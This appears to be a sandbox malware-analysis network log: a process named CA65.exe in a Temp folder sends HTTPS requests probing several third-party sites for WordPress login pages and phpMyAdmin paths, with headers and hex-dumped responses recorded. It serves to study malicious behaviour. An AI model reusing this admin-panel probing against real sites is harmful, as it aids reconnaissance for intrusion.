Office</a></li></ul></div></li><li class="fsNavParentPage"><a href="/learning">Learning</a><div class="fsNavPageInfo"><ul class="fsNavLevel2"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
300	192.168.2.4	55700	50.31.65.5	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:10 UTC	178	OUT	GET /wp-login.php HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:12 UTC	555	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.3.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN transfer-encoding: chunked date: Fri, 22 Dec 2023 20:15:12 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:12 UTC	813	IN	Data Raw: 32 31 62 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 45 6e 74 72 61 20 26 6c 73 61 71 75 6f 3b 20 53 61 6c 74 20 64 65 6c 20 43 6f 6c 6f 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 Data Ascii: 21b7<!DOCTYPE html><html lang="ca"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Entra &lsaquo; Salt del Colom — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noarchiv
2023-12-22 20:15:12 UTC	7826	IN	Data Raw: 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 32 2e 33 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 Data Ascii: s://saltdelcolom.com/wp-admin/css/login.min.css?ver=6.2.3' media='all' /><meta name='referrer' content='strict-origin-when-cross-origin' /><meta name="viewport" content="width=device-width" /><link rel="icon" href="https://saltdelcolom.com/wp-conte
2023-12-22 20:15:12 UTC	418	IN	Data Raw: 31 39 36 0d 0a 09 09 09 3c 73 63 72 69 70 74 3e 0d 0a 09 09 09 2f 28 74 72 69 64 65 6e 74 7c 6d 73 69 65 29 2f 69 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 26 26 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 26 26 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 68 61 73 68 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 2f 5e 5b 41 2d 7a 30 2d 39 5f 2d 5d 2b 24 2f 2e 74 65 73 74 28 65 29 26 26 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 29 26 Data Ascii: 196<script>/(trident\|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.addEventListener&&window.addEventListener("hashchange",function(){var t,e=location.hash.substring(1);/^[A-z0-9_-]+$/.test(e)&&(t=document.getElementById(e))&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
301	192.168.2.4	55738	104.26.0.173	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:10 UTC	246	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	1362	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: max-age=0, no-cache, s-maxage=10 X-Frame-Options: SAMEORIGIN Set-Cookie: PHPSESSID=3ma2mp4egmtg531c361dfg1mdh; path=/ Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:10 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_sec_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:10 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:10 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_sec_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:10 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_logged_in_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:10 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_logged_in_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:10 GMT; Max-Age=0; path=/ Set-Cookie: wp-settings-0=%20; expires=Thu, 22-Dec-2022 20:15:10 GMT; Max-Age=0; path=/
2023-12-22 20:15:11 UTC	1261	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 70 2d 73 65 74 74 69 6e 67 73 2d 74 69 6d 65 2d 30 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 31 30 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 30 30 36 34 63 39 66 66 62 36 35 34 34 35 66 63 34 66 63 31 32 33 34 65 31 65 66 34 66 64 61 39 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 31 30 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 30 30 36 34 63 39 66 66 62 36 35 34 34 35 66 63 34 66 63 31 32 Data Ascii: Set-Cookie: wp-settings-time-0=%20; expires=Thu, 22-Dec-2022 20:15:10 GMT; Max-Age=0; path=/Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:10 GMT; Max-Age=0; path=/Set-Cookie: wordpress_0064c9ffb65445fc4fc12
2023-12-22 20:15:11 UTC	381	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 4a 63 36 41 48 4c 75 25 32 46 68 34 49 6c 43 39 45 39 73 41 69 43 34 47 39 4d 6e 53 42 4d 25 32 42 49 50 69 5a 55 45 74 52 43 74 42 64 25 32 42 4e 49 5a 55 39 59 31 78 50 71 77 69 7a 47 35 33 6d 32 70 31 34 56 72 57 77 4e 63 25 32 42 78 55 79 4d 4b 78 4a 39 71 6e 25 32 46 44 38 4a 65 64 75 72 62 7a 33 6e 39 4b 7a 49 63 65 70 6e 6e 6e 76 30 75 37 44 32 73 36 48 63 50 47 65 72 70 77 54 25 32 46 5a 5a 35 65 37 4e 45 52 72 66 63 36 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jc6AHLu%2Fh4IlC9E9sAiC4G9MnSBM%2BIPiZUEtRCtBd%2BNIZU9Y1xPqwizG53m2p14VrWwNc%2BxUyMKxJ9qn%2FD8Jedurbz3n9KzIcepnnnv0u7D2s6HcPGerpwT%2FZZ5e7NERrfc6"}],"group":"cf-nel","max_age":60
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 31 36 36 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 Data Ascii: 166d<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>Log In &lsaquo; The Produce Box — WordPress</title><meta name='robots' content='noindex, follow'/><link rel='styleshe
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 3e 55 73 65 72 6e 61 6d 65 20 6f 72 20 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 22 20 69 64 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 0a 09 09 09 3c 64 69 Data Ascii: .php" method="post"><p><label for="user_login">Username or Email Address</label><input type="text" name="log" id="user_login" class="input" value="" size="20" autocapitalize="off" autocomplete="username" required="required"/></p><di
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 6f 72 64 3f 3c 2f 61 3e 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 66 75 6e 63 74 69 6f 6e 20 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 65 72 5f 6c 6f 67 69 6e 22 29 3b 64 2e 66 6f 63 75 73 28 29 3b 64 2e 73 65 6c 65 63 74 28 29 3b 7d 63 61 74 63 68 28 65 72 29 7b 7d 7d 2c 32 30 30 29 3b 7d 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 69 66 28 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 29 7b 77 70 4f 6e 6c 6f Data Ascii: ord?</a></p><script type="text/javascript">//<![CDATA[function wp_attempt_focus(){setTimeout(function(){try{d=document.getElementById("user_login");d.focus();d.select();}catch(er){}},200);}wp_attempt_focus();if(typeof wpOnload==='function'){wpOnlo
2023-12-22 20:15:11 UTC	1369	IN	Data Raw: 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 35 2e 30 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 Data Ascii: ducebox.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script><script type="text/javascript" src="https://theproducebox.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><script
2023-12-22 20:15:11 UTC	273	IN	Data Raw: 70 74 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 3d 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 30 64 31 32 37 39 61 39 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 32 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f Data Ascii: pt" id="user-profile-js-extra">//<![CDATA[var userProfileL10n={"user_id":"0","nonce":"f40d1279a9"};//...</script><script type="text/javascript" src="https://theproducebox.com/wp-admin/js/user-profile.min.js?ver=6.4.2" id="user-profile-js"></script></
2023-12-22 20:15:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
302	192.168.2.4	55735	64.68.191.221	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:10 UTC	181	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: www.adelaideclub.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	597	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-Result-Reason: Not Redirected X-UrlRewriter-404: 404 Rewritten to DNN Tab : 404 Error Page(Tabid:37) : Reason Requested_404 X-UA-Compatible: IE=edge Set-Cookie: dnn_IsMobile=False; path=/; HttpOnly Set-Cookie: __RequestVerificationToken=31z5xtnHMpNPA4Ijz--Qd5w5_vgF2KoD2pgUgQQANnNOPVdm1MTZ6Xx1gAabyZGaZiPgFQ2; path=/; HttpOnly X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Date: Fri, 22 Dec 2023 20:15:11 GMT Connection: close Content-Length: 33332
2023-12-22 20:15:11 UTC	15787	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 2f 3e 0a 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 46 43 36 36 47 35 43 43 37 50 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 Data Ascii: <!DOCTYPE html><html lang="en-US"><head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />... Google tag (gtag.js) --><script async src="https://www.googletagmanager.com/gtag/js?id=G-FC66G5CC7P"></script><script> w
2023-12-22 20:15:11 UTC	16384	IN	Data Raw: 6c 65 43 6f 6e 74 65 6e 74 20 4d 6f 64 32 73 78 63 61 70 70 43 22 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 27 73 63 2d 63 6f 6e 74 65 6e 74 2d 62 6c 6f 63 6b 27 20 20 64 61 74 61 2d 63 62 2d 69 6e 73 74 61 6e 63 65 3d 27 37 30 36 27 20 64 61 74 61 2d 63 62 2d 69 64 3d 27 37 30 36 27 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 6d 79 2d 36 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 73 6d 2d 36 20 63 6f 6c 2d 6c 67 2d 33 20 74 65 78 74 2d 63 65 6e 74 65 72 20 6d 62 2d 35 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 Data Ascii: leContent Mod2sxcappC"><div class='sc-content-block' data-cb-instance='706' data-cb-id='706'><div class="container my-6"> <div class="row"> <div class="col-sm-6 col-lg-3 text-center mb-5 d-flex flex-column align-items-center">
2023-12-22 20:15:11 UTC	1161	IN	Data Raw: 3f 63 64 76 3d 31 30 39 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6f 72 74 61 6c 73 2f 5f 64 65 66 61 75 6c 74 2f 73 6b 69 6e 73 2f 63 61 6d 62 72 69 64 67 65 2d 61 64 65 6c 61 69 64 65 2f 6a 73 2f 6a 71 75 65 72 79 2e 73 6c 69 6d 6d 65 6e 75 2e 6a 73 3f 63 64 76 3d 31 30 39 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6f 72 74 61 6c 73 2f 5f 64 65 66 61 75 6c 74 2f 73 6b 69 6e 73 2f 63 61 6d 62 72 69 64 67 65 2d 61 64 65 6c 61 69 64 65 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 6c 6c 69 70 73 69 73 2e 6d 69 6e 2e 6a 73 3f 63 64 76 3d 31 30 39 22 20 74 79 70 Data Ascii: ?cdv=109" type="text/javascript"></script><script src="/Portals/_default/skins/cambridge-adelaide/js/jquery.slimmenu.js?cdv=109" type="text/javascript"></script><script src="/Portals/_default/skins/cambridge-adelaide/js/jquery.ellipsis.min.js?cdv=109" typ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
303	192.168.2.4	56249	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:10 UTC	168	OUT	GET /pma/ HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	981	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://cannaclear.com CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding x-redirect-by: Rank Math Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jkixPgjmIOSTjraC9vyYULhw3FZjGWtXvLU%2B4OEWP4%2BFS7%2BmRM3m9H5xt4u29sf20iFzs4tIR1T989Z3ti%2BTpqJvFqdhWWGixxVY%2B9G1S2ba1FiuyW8H8VWnFKBDnFeW9g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b090ebfc72884-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
304	192.168.2.4	56455	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:11 UTC	203	OUT	GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:11 UTC	792	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:15:11 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:15:11 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EC%2BZVCG9enCtJeIq3lexRoqzThwbQ3cncHS6oD57XOiC2s1VMibX3OUqF8ZJczanSCePs9rYvIVApvuqKiLYUy506OxqkdEnrGg1gw4Hrlget1Rb4KINY2aTESgWCLVnbMRyRoM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b090f6b0c0a12-MIA
2023-12-22 20:15:11 UTC	577	IN	Data Raw: 37 63 38 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 Data Ascii: 7c8a<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
